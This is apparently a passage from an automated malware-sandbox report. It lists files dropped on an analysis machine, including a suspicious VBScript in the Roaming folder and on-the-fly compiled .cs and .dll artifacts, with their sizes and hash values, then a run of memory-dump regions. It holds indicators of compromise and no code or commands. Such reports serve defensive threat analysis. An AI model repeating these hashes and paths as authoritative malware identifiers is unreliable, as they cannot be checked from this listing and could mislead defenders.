787af764cc95d82b5d9de4cc1653ba5404ad37b4

SHA256
a3d624a1bd7765d2e37435b543feb94707d9cef781bb1763aac7a0228c15888d

SHA512
afad46fb3d6874eec6bf4ae01ac567b416e3da0a3e125a0d3a732b4e6b59953611d6c9126e60249fd62fe5bf5bffc5c24b2f917c66e60663ec57895e6637080e

Download Submit
C:\Users\Admin\AppData\Local\Temp\-m8bxw8b.dll

Filesize
3KB

MD5
108a74c54e08830bd7b55f346c6f0759

SHA1
3743dbf391699e45f381d27bdfa3b364c6be1fac

SHA256
9e432ba983742636c72b7bfa61fdcc46f9659650ee838d1a072c8648f1f00794

SHA512
5f768a9cf419b095121a827eeee2837ff6912208e2cb509dcdb0d6343fd232d8d93c4ce1679c213b2df3b4b771f30f21b54f9c2a013c72f5f582645b9394ecaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\-m8bxw8b.pdb

Filesize
7KB

MD5
0d7472563867dddb2d01b6b833dd2433

SHA1
a1b726a3289e7894fa6ae079415516a1b7bf0f0c

SHA256
654d992baff2c383e43519488fe5f6210dba576e1ccc9e1ffa94fd1f0c09839d

SHA512
1bcc4a4070a23eb28329e4e1e86d250a6a6d3306db87aac000b08921be348b42220b09b980af68352e9e92d9a1236799eac1d3612deeacf9a783c76693457421

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab82F8.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDDA3.tmp

Filesize
1KB

MD5
1e27e1f57a96c73c1a60f7537c5fc41f

SHA1
e5cd1d1e79389301e5dc66c05e24c41f10b9a54c

SHA256
5752f6099e4f04e4ef092e915e84578c8918c7b7a0e02c2f4ba7a228e9495059

SHA512
ab69f17fe366888f4cfd84542fd25271cc737cca1a9dbe25ffe54ce18cebf9d9c1c0b590fd9846ac53a2fc40167de324b6087a6268e32e0c739d82f73f9da468

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar830B.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
5dc3a7bc4ed0d0221a455440613148a6

SHA1
6820f162e6f3f1f63ce0df7425d584d56016dabf

SHA256
840bde501ca2414d0f708dc9580032d2e3e78ff5864d75f5f0a91a600d220bb2

SHA512
130629d30fd32d86a2e572d799cce84405eecbfb01bda7f4ab785c0399f0a84fa9c6d82dbc6f2b01315e69157a82171b5af7df40243276c1da38f1306d5ff3d2

Download Submit
C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS

Filesize
213KB

MD5
b14ef4fa92414ea1658977a049f15306

SHA1
11e59f935817673e2b68cfd36e4ce93d15034714

SHA256
a6f979fe5ca109e929031fd0811506343b3089a13300438be24070650c6b6bf3

SHA512
8b627fd09767ba773acdbcce52b646b1b819b261b72c17289d443a6c7e504f34b3402a64f73d48fef893d7d38dfbeef213ed5218c211558428307d69a03f9630

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\-m8bxw8b.0.cs

Filesize
478B

MD5
680c55127532e413a19eddb51b0cb473

SHA1
7d279e255bc675f1c09df8b210ee4472b5d3b8b6

SHA256
fdd40f201088921031cf300fdce7ca0be6e458b70d0f5df699cf6a0cc33a7515

SHA512
27a542c554c27adf777c741eb218b7a0634392abced081722b43c51066dfb49d604473a9df4b4e257879355cb966882431286f7bbb2ed5d8a23840d837127205

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\-m8bxw8b.cmdline

Filesize
309B

MD5
a78e1edaf418963963c704723d654388

SHA1
273b83ac8a42b81cf253b0adddc6f01656316cb2

SHA256
78c257a89ef5781230d40ad3e06675c5656e03b6b774ef907aa72d82fe1a1dd9

SHA512
7f607d3ae1284f161acca92010f5dc220bb93d6491b93d7f59d01599e0c139b5682cb673ebc63474de0fdd41ca40216bae2d9cab9753a6e5e0f9bdaec0e7c8de

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCDDA2.tmp

Filesize
652B

MD5
6ff417eb7b1d484fd4bc70fdb0d64c6f

SHA1
19ca5beddaea506c41f7b9313fdec2c41f7fbbab

SHA256
e688430506f481b603bfe1f5f6ff512035e93dec31b6d00bbd794cfdef89c2a9

SHA512
1fb5c1641353bc0d20f39e37690aaa699573083064313e8c1e59f698ce8a31fc6c464a1384004971509dda93d8c2304de04bfbf925ec755ad52b089e9dfed470

Download Submit
memory/320-61-0x0000000000940000-0x0000000000942000-memory.dmp

Filesize
8KB

Download
memory/2324-121-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-142-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-125-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-143-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-115-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-119-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-130-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-129-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-128-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-127-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2324-144-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-141-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-133-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-117-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-123-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-134-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-135-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-136-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-140-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2324-139-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2708-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2708-62-0x0000000002410000-0x0000000002412000-memory.dmp

Filesize
8KB

Download
memory/2708-1-0x0000000072AAD000-0x0000000072AB8000-memory.dmp

Filesize
44KB

Download
memory/2708-3-0x0000000072AAD000-0x0000000072AB8000-memory.dmp

Filesize
44KB

Download